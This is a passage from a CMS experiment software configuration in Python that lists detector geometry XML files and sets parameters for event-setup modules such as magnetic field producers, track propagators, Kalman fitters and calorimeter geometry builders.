'Geometry/TrackerCommonData/data/tecwheel6.xml',\n 'Geometry/TrackerCommonData/data/tecservices.xml',\n 'Geometry/TrackerCommonData/data/tecbackplate.xml',\n 'Geometry/TrackerCommonData/data/tec.xml',\n 'Geometry/TrackerCommonData/data/trackermaterial.xml',\n 'Geometry/TrackerCommonData/data/tracker.xml',\n 'Geometry/TrackerCommonData/data/trackerpixbar.xml',\n 'Geometry/TrackerCommonData/data/trackerpixfwd.xml',\n 'Geometry/TrackerCommonData/data/trackertibtidservices.xml',\n 'Geometry/TrackerCommonData/data/trackertib.xml',\n 'Geometry/TrackerCommonData/data/trackertid.xml',\n 'Geometry/TrackerCommonData/data/trackertob.xml',\n 'Geometry/TrackerCommonData/data/trackertec.xml',\n 'Geometry/TrackerCommonData/data/trackerbulkhead.xml',\n 'Geometry/TrackerCommonData/data/trackerother.xml',\n 'Geometry/EcalCommonData/data/eregalgo.xml',\n 'Geometry/EcalCommonData/data/ebalgo.xml',\n 'Geometry/EcalCommonData/data/ebcon.xml',\n 'Geometry/EcalCommonData/data/ebrot.xml',\n 'Geometry/EcalCommonData/data/eecon.xml',\n 'Geometry/EcalCommonData/data/eefixed.xml',\n 'Geometry/EcalCommonData/data/eehier.xml',\n 'Geometry/EcalCommonData/data/eealgo.xml',\n 'Geometry/EcalCommonData/data/escon.xml',\n 'Geometry/EcalCommonData/data/esalgo.xml',\n 'Geometry/EcalCommonData/data/eeF.xml',\n 'Geometry/EcalCommonData/data/eeB.xml',\n 'Geometry/HcalCommonData/data/hcalrotations.xml',\n 'Geometry/HcalCommonData/data/hcalalgo.xml',\n 'Geometry/HcalCommonData/data/hcalbarrelalgo.xml',\n 'Geometry/HcalCommonData/data/hcalendcapalgo.xml',\n 'Geometry/HcalCommonData/data/hcalouteralgo.xml',\n 'Geometry/HcalCommonData/data/hcalforwardalgo.xml',\n 'Geometry/HcalCommonData/data/hcalforwardfibre.xml',\n 'Geometry/HcalCommonData/data/hcalforwardmaterial.xml',\n 'Geometry/MuonCommonData/data/mbCommon.xml',\n 'Geometry/MuonCommonData/data/mb1.xml',\n 'Geometry/MuonCommonData/data/mb2.xml',\n 'Geometry/MuonCommonData/data/mb3.xml',\n 'Geometry/MuonCommonData/data/mb4.xml',\n 'Geometry/MuonCommonData/data/muonYoke.xml',\n 'Geometry/MuonCommonData/data/mf.xml',\n 'Geometry/ForwardCommonData/data/forward.xml',\n 'Geometry/ForwardCommonData/data/forwardshield.xml',\n 'Geometry/ForwardCommonData/data/brmrotations.xml',\n 'Geometry/ForwardCommonData/data/brm.xml',\n 'Geometry/ForwardCommonData/data/totemMaterials.xml',\n 'Geometry/ForwardCommonData/data/totemRotations.xml',\n 'Geometry/ForwardCommonData/data/totemt1.xml',\n 'Geometry/ForwardCommonData/data/totemt2.xml',\n 'Geometry/ForwardCommonData/data/ionpump.xml',\n 'Geometry/ForwardCommonData/data/castor.xml',\n 'Geometry/ForwardCommonData/data/zdcmaterials.xml',\n 'Geometry/ForwardCommonData/data/lumimaterials.xml',\n 'Geometry/ForwardCommonData/data/zdcrotations.xml',\n 'Geometry/ForwardCommonData/data/lumirotations.xml',\n 'Geometry/ForwardCommonData/data/zdc.xml',\n 'Geometry/ForwardCommonData/data/zdclumi.xml',\n 'Geometry/ForwardCommonData/data/cmszdc.xml',\n 'Geometry/MuonCommonData/data/muonNumbering.xml',\n 'Geometry/TrackerCommonData/data/trackerStructureTopology.xml',\n 'Geometry/TrackerSimData/data/trackersens.xml',\n 'Geometry/TrackerRecoData/data/trackerRecoMaterial.xml',\n 'Geometry/EcalSimData/data/ecalsens.xml',\n 'Geometry/HcalCommonData/data/hcalsens.xml',\n 'Geometry/HcalSimData/data/CaloUtil.xml',\n 'Geometry/MuonSimData/data/muonSens.xml',\n 'Geometry/DTGeometryBuilder/data/dtSpecsFilter.xml',\n 'Geometry/CSCGeometryBuilder/data/cscSpecsFilter.xml',\n 'Geometry/CSCGeometryBuilder/data/cscSpecs.xml',\n 'Geometry/RPCGeometryBuilder/data/RPCSpecs.xml',\n 'Geometry/ForwardCommonData/data/brmsens.xml',\n 'Geometry/ForwardSimData/data/totemsensT1.xml',\n 'Geometry/ForwardSimData/data/totemsensT2.xml',\n 'Geometry/ForwardSimData/data/castorsens.xml',\n 'Geometry/ForwardSimData/data/zdcsens.xml')+cms.vstring( 'Geometry/HcalSimData/data/CaloProdCuts.xml',\n 'Geometry/HcalSimData/data/HcalProdCuts.xml',\n 'Geometry/EcalSimData/data/EcalProdCuts.xml',\n 'Geometry/TrackerSimData/data/trackerProdCuts.xml',\n 'Geometry/TrackerSimData/data/trackerProdCutsBEAM.xml',\n 'Geometry/MuonSimData/data/muonProdCuts.xml',\n 'Geometry/ForwardSimData/data/CastorProdCuts.xml',\n 'Geometry/ForwardSimData/data/zdcProdCuts.xml',\n 'Geometry/ForwardSimData/data/ForwardShieldProdCuts.xml',\n 'Geometry/CMSCommonData/data/FieldParameters.xml') )\n)\nprocess.eegeom = cms.ESSource( \"EmptyESSource\",\n recordName = cms.string( \"EcalMappingRcd\" ),\n iovIsRunNotTime = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n firstValid = cms.vuint32( 1 )\n)\nprocess.es_hardcode = cms.ESSource( \"HcalHardcodeCalibrations\",\n toGet = cms.untracked.vstring( 'GainWidths' ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.magfield = cms.ESSource( \"XMLIdealGeometryESSource\",\n rootNodeName = cms.string( \"cmsMagneticField:MAGF\" ),\n appendToDataLabel = cms.string( \"\" ),\n geomXMLFiles = cms.vstring( 'Geometry/CMSCommonData/data/normal/cmsextent.xml',\n 'Geometry/CMSCommonData/data/cms.xml',\n 'Geometry/CMSCommonData/data/cmsMagneticField.xml',\n 'MagneticField/GeomBuilder/data/MagneticFieldVolumes_1103l.xml',\n 'MagneticField/GeomBuilder/data/MagneticFieldParameters_07_2pi.xml' )\n)\n\nprocess.AnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.AnyDirectionAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnyDirectionAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.AutoMagneticFieldESProducer = cms.ESProducer( \"AutoMagneticFieldESProducer\",\n label = cms.untracked.string( \"\" ),\n valueOverride = cms.int32( -1 ),\n appendToDataLabel = cms.string( \"\" ),\n nominalCurrents = cms.untracked.vint32( -1, 0, 9558, 14416, 16819, 18268, 19262 ),\n mapLabels = cms.untracked.vstring( '090322_3_8t',\n '0t',\n '071212_2t',\n '071212_3t',\n '071212_3_5t',\n '090322_3_8t',\n '071212_4t' )\n)\nprocess.CSCGeometryESModule = cms.ESProducer( \"CSCGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n useRealWireGeometry = cms.bool( True ),\n useOnlyWiresInME1a = cms.bool( False ),\n useGangedStripsInME1a = cms.bool( True ),\n useCentreTIOffsets = cms.bool( False ),\n useDDD = cms.bool( True ),\n applyAlignment = cms.bool( True )\n)\nprocess.CaloGeometryBuilder = cms.ESProducer( \"CaloGeometryBuilder\",\n appendToDataLabel = cms.string( \"\" ),\n SelectedCalos = cms.vstring( 'HCAL',\n 'ZDC',\n 'EcalBarrel',\n 'EcalEndcap',\n 'EcalPreshower',\n 'TOWER' )\n)\nprocess.CaloTopologyBuilder = cms.ESProducer( \"CaloTopologyBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CaloTowerConstituentsMapBuilder = cms.ESProducer( \"CaloTowerConstituentsMapBuilder\",\n MapFile = cms.untracked.string( \"Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CaloTowerHardcodeGeometryEP = cms.ESProducer( \"CaloTowerHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.Chi2EstimatorForRefit = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"Chi2EstimatorForRefit\" ),\n MaxChi2 = cms.double( 100000.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.Chi2MeasurementEstimator = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"Chi2\" ),\n MaxChi2 = cms.double( 30.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.CkfTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"CkfTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"ckfBaseTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.DTGeometryESModule = cms.ESProducer( \"DTGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n fromDDD = cms.bool( True ),\n applyAlignment = cms.bool( True )\n)\nprocess.DummyDetLayerGeometry = cms.ESProducer( \"DetLayerGeometryESProducer\",\n ComponentName = cms.string( \"DummyDetLayerGeometry\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.ESUnpackerWorkerESProducer = cms.ESProducer( \"ESUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"esRawToRecHit\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) ),\n RHAlgo = cms.PSet( \n Type = cms.string( \"ESRecHitWorker\" ),\n ESGain = cms.int32( 1 ),\n ESBaseline = cms.int32( 1000 ),\n ESMIPADC = cms.double( 9.0 ),\n ESMIPkeV = cms.double( 81.08 )\n )\n)\nprocess.EcalBarrelGeometryEP = cms.ESProducer( \"EcalBarrelGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalElectronicsMappingBuilder = cms.ESProducer( \"EcalElectronicsMappingBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.EcalEndcapGeometryEP = cms.ESProducer( \"EcalEndcapGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalLaserCorrectionService = cms.ESProducer( \"EcalLaserCorrectionService\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.EcalPreshowerGeometryEP = cms.ESProducer( \"EcalPreshowerGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalRegionCablingESProducer = cms.ESProducer( \"EcalRegionCablingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n esMapping = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) )\n)\nprocess.EcalUnpackerWorkerESProducer = cms.ESProducer( \"EcalUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( \n tccUnpacking = cms.bool( True ),\n orderedDCCIdList = cms.vint32( 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ),\n srpUnpacking = cms.bool( False ),\n syncCheck = cms.bool( False ),\n headerUnpacking = cms.bool( False ),\n orderedFedList = cms.vint32( 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654 ),\n feUnpacking = cms.bool( True ),\n feIdCheck = cms.bool( True ),\n memUnpacking = cms.bool( False ),\n forceKeepFRData = cms.bool( False )\n ),\n ElectronicsMapper = cms.PSet( \n numbXtalTSamples = cms.uint32( 10 ),\n numbTriggerTSamples = cms.uint32( 1 )\n ),\n UncalibRHAlgo = cms.PSet( Type = cms.string( \"EcalUncalibRecHitWorkerWeights\" ) ),\n CalibRHAlgo = cms.PSet( \n Type = cms.string( \"EcalRecHitWorkerSimple\" ),\n ChannelStatusToBeExcluded = cms.vint32( ),\n flagsMapDBReco = cms.vint32( 0, 0, 0, 0, 4, -1, -1, -1, 4, 4, 6, 6, 6, 7, 8 ),\n killDeadChannels = cms.bool( True )\n )\n)\nprocess.FastSteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"FastSteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FastSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"FastSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FitterRK = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"FitterRK\" ),\n Propagator = cms.string( \"RungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FittingSmootherRK = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"FittingSmootherRK\" ),\n Fitter = cms.string( \"FitterRK\" ),\n Smoother = cms.string( \"SmootherRK\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.GlobalTrackingGeometryESProducer = cms.ESProducer( \"GlobalTrackingGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HITTRHBuilderWithoutRefit = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"HITTRHBuilderWithoutRefit\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"Fake\" ),\n Matcher = cms.string( \"Fake\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HcalHardcodeGeometryEP = cms.ESProducer( \"HcalHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HcalTopologyIdealEP = cms.ESProducer( \"HcalTopologyIdealEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFFitterForRefitInsideOut = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"KFFitterForRefitInsideOut\" ),\n Propagator = cms.string( \"SmartPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2EstimatorForRefit\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFFitterSmootherForL2Muon = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"KFFitterSmootherForL2Muon\" ),\n Fitter = cms.string( \"KFTrajectoryFitterForL2Muon\" ),\n Smoother = cms.string( \"KFTrajectorySmootherForL2Muon\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFSmootherForMuonTrackLoader = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFSmootherForMuonTrackLoader\" ),\n Propagator = cms.string( \"SmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 10.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFSmootherForRefitInsideOut = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFSmootherForRefitInsideOut\" ),\n Propagator = cms.string( \"SmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2EstimatorForRefit\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFTrajectoryFitterForL2Muon = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"KFTrajectoryFitterForL2Muon\" ),\n Propagator = cms.string( \"FastSteppingHelixPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFTrajectorySmootherForL2Muon = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFTrajectorySmootherForL2Muon\" ),\n Propagator = cms.string( \"FastSteppingHelixPropagatorOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFUpdatorESProducer = cms.ESProducer( \"KFUpdatorESProducer\",\n ComponentName = cms.string( \"KFUpdator\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.L3MuKFFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"L3MuKFFitter\" ),\n Propagator = cms.string( \"SmartPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterial\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n stripClusterProducer = cms.string( \"hltSiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( )\n)\nprocess.MuonCkfTrajectoryBuilder = cms.ESProducer( \"MuonCkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"muonCkfTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n propagatorProximity = cms.string( \"SteppingHelixPropagatorAny\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"muonCkfTrajectoryFilter\" ),\n useSeedLayer = cms.bool( False ),\n rescaleErrorIfFail = cms.double( 1.0 ),\n deltaEta = cms.double( 0.1 ),\n deltaPhi = cms.double( 0.1 ),\n appendToDataLabel = cms.string( \"\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( False ),\n alwaysUseInvalidHits = cms.bool( True )\n)\nprocess.MuonDetLayerGeometryESProducer = cms.ESProducer( \"MuonDetLayerGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MuonNumberingInitialization = cms.ESProducer( \"MuonNumberingInitialization\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MuonTransientTrackingRecHitBuilderESProducer = cms.ESProducer( \"MuonTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"MuonRecHitBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.OppositeMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterialOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.PixelCPEGenericESProducer = cms.ESProducer( \"PixelCPEGenericESProducer\",\n ComponentName = cms.string( \"PixelCPEGeneric\" ),\n eff_charge_cut_lowX = cms.double( 0.0 ),\n eff_charge_cut_lowY = cms.double( 0.0 ),\n eff_charge_cut_highX = cms.double( 1.0 ),\n eff_charge_cut_highY = cms.double( 1.0 ),\n size_cutX = cms.double( 3.0 ),\n size_cutY = cms.double( 3.0 ),\n EdgeClusterErrorX = cms.double( 50.0 ),\n EdgeClusterErrorY = cms.double( 85.0 ),\n inflate_errors = cms.bool( False ),\n inflate_all_errors_no_trk_angle = cms.bool( False ),\n UseErrorsFromTemplates = cms.bool( True ),\n TruncatePixelCharge = cms.bool( True ),\n IrradiationBiasCorrection = cms.bool( False ),\n DoCosmics = cms.bool( False ),\n LoadTemplatesFromDB = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n TanLorentzAnglePerTesla = cms.double( 0.106 ),\n PixelErrorParametrization = cms.string( \"NOTcmsim\" ),\n Alpha2Order = cms.bool( True ),\n ClusterProbComputationFlag = cms.int32( 0 )\n)\nprocess.RPCGeometryESModule = cms.ESProducer( \"RPCGeometryESModule\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.RungeKuttaTrackerPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"RungeKuttaTrackerPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( True ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SiStripGainESProducer = cms.ESProducer( \"SiStripGainESProducer\",\n AutomaticNormalization = cms.bool( False ),\n NormalizationFactor = cms.double( 1.0 ),\n printDebug = cms.untracked.bool( False ),\n APVGain = cms.string( \"\" )\n)\nprocess.SiStripRecHitMatcherESProducer = cms.ESProducer( \"SiStripRecHitMatcherESProducer\",\n ComponentName = cms.string( \"StandardMatcher\" ),\n NSigmaInside = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SiStripRegionConnectivity = cms.ESProducer( \"SiStripRegionConnectivity\",\n EtaDivisions = cms.untracked.uint32( 20 ),\n PhiDivisions = cms.untracked.uint32( 20 ),\n EtaMax = cms.untracked.double( 2.5 )\n)\nprocess.SlaveField0 = cms.ESProducer( \"UniformMagneticFieldESProducer\",\n ZFieldInTesla = cms.double( 0.0 ),\n label = cms.untracked.string( \"slave_0\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SlaveField20 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_20\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"2_0T\" ) )\n)\nprocess.SlaveField30 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_30\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"3_0T\" ) )\n)\nprocess.SlaveField35 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_35\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"3_5T\" ) )\n)\nprocess.SlaveField38 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_38\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"3_8T\" ) )\n)\nprocess.SlaveField40 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_40\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"4_0T\" ) )\n)\nprocess.SmartPropagator = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAlong\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorAny = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorAny\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorAnyOpposite = cms.ESProducer( 